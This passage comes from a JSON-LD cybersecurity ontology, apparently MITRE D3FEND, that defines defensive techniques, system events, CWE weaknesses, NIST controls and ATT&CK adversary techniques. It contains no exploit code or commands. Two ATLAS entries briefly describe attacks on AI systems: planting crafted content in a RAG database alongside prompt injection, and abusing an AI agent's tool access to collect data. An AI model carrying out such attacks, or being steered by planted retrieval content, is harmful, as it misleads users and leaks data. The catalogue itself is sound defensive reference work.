          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:AuthenticationCacheInvalidation"
        },
        {
          "@id": "d3f:AuthenticationEventThresholding"
        }
      ],
      "rdfs:label": "Account Use Policies"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingCertifiableElectromagneticPulseAndRFIProtection_InstantAccessNetworksLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070105445A1"
      },
      "d3f:kb-abstract": "Disclosed are a system and method for providing certifiable shielded cabinets and rooms, or pods, to protect devices, equipment and people from electromagnetic interference such as electromagnetic pulse, and directed energy attack. The method simulates the separate electric and magnetic shield requirements and capabilities of each type of materials, simulating them separately and together to form a combined set of materials layered for an enhanced electromagnetic shield that is lighter weight and less expensive. Further disclosed is a system and method for SCADA, RFID, and OID monitoring and controls to enable initial and ongoing testing and control.",
      "d3f:kb-author": "Charles Manto, Joseph Child",
      "d3f:kb-mitre-analysis": "This patent discloses a system for protecting devices, equipment, and people from EMI, EMP (including high-altitude EMP), RFI, directed energy weapons, and natural events such as extreme solar flares, using layered combinations of lightweight metals and ferrous materials simulated separately and together to optimize shielding effectiveness.",
      "d3f:kb-organization": "Instant Access Networks LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ElectromagneticRadiationHardening"
      },
      "d3f:kb-reference-title": "System and method for providing certifiable electromagnetic pulse and rfi protection through mass-produced shielded containers and rooms",
      "rdfs:label": "Reference - System and method for providing certifiable electromagnetic pulse and rfi protection through mass-produced shielded containers and rooms - Instant Access Networks LLC"
    },
    {
      "@id": "d3f:OSAPISystemFunction",
      "@type": "owl:Class",
      "d3f:definition": "Indirect System calls are made through an OS-specific library (like glibc in Linux) that provides a higher-level API for the system calls.",
      "d3f:synonym": "Indirect System Call",
      "rdfs:label": "OS API System Function",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFunction"
      }
    },
    {
      "@id": "d3f:RestoreObject",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreObject"
      ],
      "d3f:d3fend-id": "D3-RO",
      "d3f:definition": "Restoring an object for an entity to access. This is the broadest class for object restoral.",
      "d3f:enables": {
        "@id": "d3f:Restore"
      },
      "rdfs:label": "Restore Object",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N055d75856f05419690c6144a1ce80ea9"
        }
      ]
    },
    {
      "@id": "_:N055d75856f05419690c6144a1ce80ea9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Restore"
      }
    },
    {
      "@id": "d3f:OSAPILoadModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that loads a module into memory and makes it available for execution.",
      "d3f:invokes": {
        "@id": "d3f:LoadModule"
      },
      "rdfs:label": "OS API Load Module",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N219478db07cc4380a106686e5f463dc7"
        }
      ]
    },
    {
      "@id": "_:N219478db07cc4380a106686e5f463dc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoadModule"
      }
    },
    {
      "@id": "d3f:T1173",
      "@type": "owl:Class",
      "d3f:attack-id": "T1173",
      "d3f:definition": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1559.002",
      "rdfs:label": "Dynamic Data Exchange",
      "rdfs:seeAlso": {
        "@id": "d3f:T1559.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:ApplicationInstallationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the installation of an application onto a system, making it available for use and interaction.",
      "rdfs:label": "Application Installation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N34a61466fa984636a0e98166a064a4e0"
        }
      ]
    },
    {
      "@id": "_:N34a61466fa984636a0e98166a064a4e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareDeploymentTool"
      }
    },
    {
      "@id": "d3f:AML.T0066",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0066",
      "d3f:definition": "Adversaries may write content designed to be retrieved by user queries and influence a user of the system in some way. This abuses the trust the user has in the system.\n\nThe crafted content can be combined with a prompt injection. It can also stand alone in a separate document or email. The adversary must get the crafted content into the victim's database, such as a vector database used in a retrieval augmented generation (RAG) system. This may be accomplished via cyber access, or by abusing the ingestion mechanisms common in RAG systems (see [RAG Poisoning](/techniques/AML.T0070)).\n\nLarge language models may be used as an assistant to aid an adversary in crafting content.",
      "rdfs:label": "Retrieval Content Crafting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0066"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Retrieval Content Crafting"
    },
    {
      "@id": "d3f:MemoryReadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process retrieves data from a specific memory address, either from its own allocated space or that of another process.",
      "rdfs:label": "Memory Read Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nf5902368d55041c0bc30e1a0b28c58ec"
        },
        {
          "@id": "_:N365bef1df0cc408ea06bea8c7e28bb4f"
        }
      ]
    },
    {
      "@id": "_:Nf5902368d55041c0bc30e1a0b28c58ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "_:N365bef1df0cc408ea06bea8c7e28bb4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1584.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.005",
      "d3f:definition": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
      "rdfs:label": "Botnet",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:C4.5",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-C4.",
      "d3f:definition": "C4.5 is an algorithm that is strongly based on ID3. It creates decision trees the same way as ID3. C4.5 improves on several aspects of ID3, including handling discrete variables, handling training data with missing values, and automatically pruning the decision trees it creates.",
      "d3f:kb-article": "## References\nC4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).",
      "rdfs:label": "C4.5",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:adds",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x adds y: The subject x adds a data object y, such as a file, to some other digital artifact, such as a directory. Examples include an agent or technique adding a record to a database or a domain entry to a DNS server.",
      "rdfs:label": "adds",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-add"
        }
      ]
    },
    {
      "@id": "d3f:T1586.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586.003",
      "d3f:definition": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)",
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1586"
      }
    },
    {
      "@id": "d3f:NetworkLink",
      "@type": "owl:Class",
      "d3f:definition": "A network link is a link within the network layer, which is responsible for packet forwarding including routing through intermediate routers.",
      "d3f:synonym": [
        "Layer-3 Link",
        "Network Layer Link"
      ],
      "rdfs:label": "Network Link",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Network_layer"
        },
        {
          "@id": "https://www.techtarget.com/searchnetworking/definition/Network-layer"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "d3f:LinuxRenameat",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file. Different parameter handling than Linux Rename.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/renameat.2.html"
      },
      "rdfs:label": "Linux Renameat",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:CWE-1106",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1106",
      "d3f:definition": "The source code uses literal constants that may need to change or evolve over time, instead of using symbolic constants.",
      "rdfs:label": "Insufficient Use of Symbolic Constants",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_27",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Redundant/independent Filtering Mechanisms",
      "d3f:exactly": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(27)"
    },
    {
      "@id": "d3f:OTControlProgram",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The file stored in controller memory that is used to operate the controller.",
      "d3f:instructs": {
        "@id": "d3f:OTControlLogicProcess"
      },
      "d3f:synonym": "OT Project File",
      "rdfs:label": "OT Control Program",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N6ee72b2d6f974c0c9d6ecb0b6fe63963"
        }
      ]
    },
    {
      "@id": "_:N6ee72b2d6f974c0c9d6ecb0b6fe63963",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlLogicProcess"
      }
    },
    {
      "@id": "d3f:T1557.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557.001",
      "d3f:definition": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.",
      "d3f:produces": {
        "@id": "d3f:IntranetMulticastNetworkTraffic"
      },
      "rdfs:label": "LLMNR/NBT-NS Poisoning and SMB Relay",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1557"
        },
        {
          "@id": "_:N0c041d00493149fc8f5aae6b2d02cf9a"
        }
      ]
    },
    {
      "@id": "_:N0c041d00493149fc8f5aae6b2d02cf9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetMulticastNetworkTraffic"
      }
    },
    {
      "@id": "d3f:deletes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x deletes y: A technique or agent x wipes out the digitally or magnetically recorded information of digital object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01001860-v"
      },
      "rdfs:label": "deletes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1058",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1058",
      "d3f:definition": "The code contains a function or method that operates in a multi-threaded environment but owns an unsafe non-final static storable or member data element.",
      "rdfs:label": "Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:CCI-001683_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system notifies organization-defined personnel or roles for account creation actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001683"
    },
    {
      "@id": "d3f:CWE-1004",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1004",
      "d3f:definition": "The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.",
      "rdfs:label": "Sensitive Cookie Without 'HttpOnly' Flag",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:OTReadValueCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Reads the contents of the specified number of consecutive parameter area words starting from the specified word.",
      "rdfs:label": "OT Read Value Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommandEvent"
        },
        {
          "@id": "_:Nb3f6531e695941308f17bd69c756d09f"
        },
        {
          "@id": "_:N9e248090c2f24c9280634a0f5fda33a4"
        }
      ]
    },
    {
      "@id": "_:Nb3f6531e695941308f17bd69c756d09f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:N9e248090c2f24c9280634a0f5fda33a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadValueCommand"
      }
    },
    {
      "@id": "d3f:DeveloperApplication",
      "@type": "owl:Class",
      "d3f:definition": "An application used to develop computer software including applications used for software construction, analysis, testing, packaging, or management.",
      "rdfs:label": "Developer Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Application_development"
        },
        {
          "@id": "dbr:Application_software"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:SystemServiceSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:definition": "Software services provided as part of the operating system, typically accessed through system calls.",
      "rdfs:label": "System Service Software",
      "rdfs:seeAlso": {
        "@id": "https://www.os-book.com/OS9/slide-dir/PPT-dir/ch2.ppt"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N4df78cdf01e24b70b5772b0b34049350"
        }
      ]
    },
    {
      "@id": "_:N4df78cdf01e24b70b5772b0b34049350",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:Reference-PointerAuthenticationProjectZero",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html"
      },
      "d3f:kb-abstract": "In this post I examine Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS, with a focus on how Apple has improved over the ARM standard. I then demonstrate a way to use an arbitrary kernel read/write primitive to forge kernel PAC signatures for the A keys, which is sufficient to execute arbitrary code in the kernel using JOP. The technique I discovered was (mostly) fixed in iOS 12.1.3. In fact, this fix first appeared in the 16D5032a beta while my research was still ongoing.",
      "d3f:kb-author": "Brandon Azad",
      "d3f:kb-organization": "Project Zero, Google, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:PointerAuthentication"
      },
      "d3f:kb-reference-title": "Examining Pointer Authentication on the iPhone XS",
      "rdfs:label": "Reference - Pointer Authentication Project Zero"
    },
    {
      "@id": "d3f:T1192",
      "@type": "owl:Class",
      "d3f:attack-id": "T1192",
      "d3f:definition": "Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1566.002",
      "rdfs:label": "Spearphishing Link",
      "rdfs:seeAlso": {
        "@id": "d3f:T1566.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0085",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085",
      "d3f:definition": "Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.\n\nAI agents may be configured to have access to tools and data sources that are not directly accessible by users. Adversaries may abuse this to collect data that a regular user wouldn't be able to access directly.",
      "rdfs:label": "Data from AI Services - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from AI Services"
    },
    {
      "@id": "d3f:Volume",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In the context of computer operating systems, a volume or logical drive is a single accessible storage area with a single file system, typically (though not necessarily) resident on a single partition of a hard disk. Although a volume might be different from a physical disk drive, it can still be accessed with an operating system's logical interface. However, a volume differs from a partition.",
      "rdfs:label": "Volume",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "Drive Volume",
        "Logical Drive"
      ]
    },
    {
      "@id": "d3f:originates-from",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x originates-from y: The digital event or artifact x began its network transit from a physical location y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02749218-v"
      },
      "rdfs:label": "originates-from",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-246",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-246",
      "d3f:definition": "The J2EE application directly uses sockets instead of using framework method calls.",
      "rdfs:label": "J2EE Bad Practices: Direct Use of Sockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:T0866",
      "@type": "owl:Class",
      "d3f:attack-id": "T0866",
      "d3f:definition": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Exploitation of Remote Services - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Exploitation of Remote Services"
    },
    {
      "@id": "d3f:LogonEvent",
      "@type": "owl:Class",
      "d3f:definition": "An authentication event where a new session is initiated, signifying the successful validation of credentials and establishment of an authorized connection to a system, application, or resource. This marks the beginning of the subject’s authenticated interaction with the system.",
      "rdfs:label": "Logon Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationEvent"
        },
        {
          "@id": "_:N38142c624eb44769896d45ece73f6e43"
        }
      ]
    },
    {
      "@id": "_:N38142c624eb44769896d45ece73f6e43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "d3f:CWE-180",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-180",
      "d3f:definition": "The product validates input before it is canonicalized, which prevents the product from detecting data that becomes invalid after the canonicalization step.",
      "rdfs:label": "Incorrect Behavior Order: Validate Before Canonicalize",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-179"
      }
    },
    {
      "@id": "d3f:T0861",
      "@type": "owl:Class",
      "d3f:attack-id": "T0861",
      "d3f:definition": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience.",
      "rdfs:label": "Point & Tag Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Point & Tag Identification"
    },
    {
      "@id": "d3f:weakness-of",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "weakness-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-weakness-of"
      }
    },
    {
      "@id": "d3f:T1059.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.012",
      "d3f:definition": "Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts.",
      "rdfs:label": "Hypervisor CLI",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:OTReadFileCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reads data in specified chunks or the contents of a specified file stored in the file device connected to the PC.",
      "d3f:has-participant": {
        "@id": "d3f:File"
      },
      "rdfs:comment": [
        "BACnet: atomicReadFile",
        "Modbus: Read File Record"
      ],
      "rdfs:label": "OT Read File Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommand"
        },
        {
          "@id": "_:Nf8f65fa4de7a4ce1a34ddaa93bd52f5f"
        }
      ]
    },
    {
      "@id": "_:Nf8f65fa4de7a4ce1a34ddaa93bd52f5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-509",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-509",
      "d3f:definition": "Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product.",
      "rdfs:label": "Replicating Malicious Code (Virus or Worm)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-507"
      }
    },
    {
      "@id": "d3f:Reference-NIST-RMF-Quick-Start-Guide-Assess-Step-FAQ",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/CSRC/media/Projects/risk-management/documents/05-Assess%20Step/NIST%20RMF%20Assess%20Step-FAQs.pdf"
      },
      "d3f:kb-abstract": "Once security and privacy controls are implemented, they need to be evaluated for correctness and effectiveness. After the initial assessment is completed and the system enters the operations/maintenance phase of the system development life cycle, the controls are assessed on an ongoing basis according to the organization and system’s continuous monitoring plans. The ongoing assessment supports the authorizing official’s decision to continue or discontinue the system’s authorization to operate. Control effectiveness assessments are performed by an independent third-party assessor or assessment team if the system categorization is moderate or high.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)",
      "rdfs:label": "Reference - NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"
    },
    {
      "@id": "d3f:CWE-66",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-66",
      "d3f:definition": "The product does not handle or incorrectly handles a file name that identifies a \"virtual\" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file.",
      "rdfs:label": "Improper Handling of File Names that Identify Virtual Resources",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:OSAPISetRegisters",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that modifies the values of CPU registers.",
      "d3f:invokes": {
        "@id": "d3f:SetRegisters"
      },
      "rdfs:label": "OS API Set Registers",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nff5e2842d34a4999ab6417192510d600"
        }
      ]
    },
    {
      "@id": "_:Nff5e2842d34a4999ab6417192510d600",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SetRegisters"
      }
    },
    {
      "@id": "d3f:CWE-1292",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1292",
      "d3f:definition": "The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.",
      "rdfs:label": "Incorrect Conversion of Security Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-157",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-157",
      "d3f:definition": "The product does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces.",
      "rdfs:label": "Failure to Sanitize Paired Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACECONT",
      "@type": "owl:Class",
      "d3f:definition": "Restart the stopped tracee process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_CONT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeProcess"
      }
    },
    {
      "@id": "d3f:T1644",
      "@type": "owl:Class",
      "d3f:attack-id": "T1644",
      "d3f:definition": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth.",
      "rdfs:label": "Out of Band Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Out of Band Data"
    },
    {
      "@id": "d3f:BayesianMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BM",
      "d3f:definition": "Bayesian analysis is a statistical procedure which endeavors to estimate parameters of an underlying distribution based on the observed distribution.",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Bayesian Analysis. [Link](https://mathworld.wolfram.com/BayesianAnalysis.html)",
      "rdfs:label": "Bayesian Method",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:T1178",
      "@type": "owl:Class",
      "d3f:attack-id": "T1178",
      "d3f:definition": "The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1134.005",
      "rdfs:label": "SID-History Injection",
      "rdfs:seeAlso": {
        "@id": "d3f:T1134.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:SSHConnectionFailEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating a failure to establish an SSH connection, often due to issues such as authentication errors, network timeouts, or server unavailability.",
      "rdfs:label": "SSH Connection Fail Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionFailEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
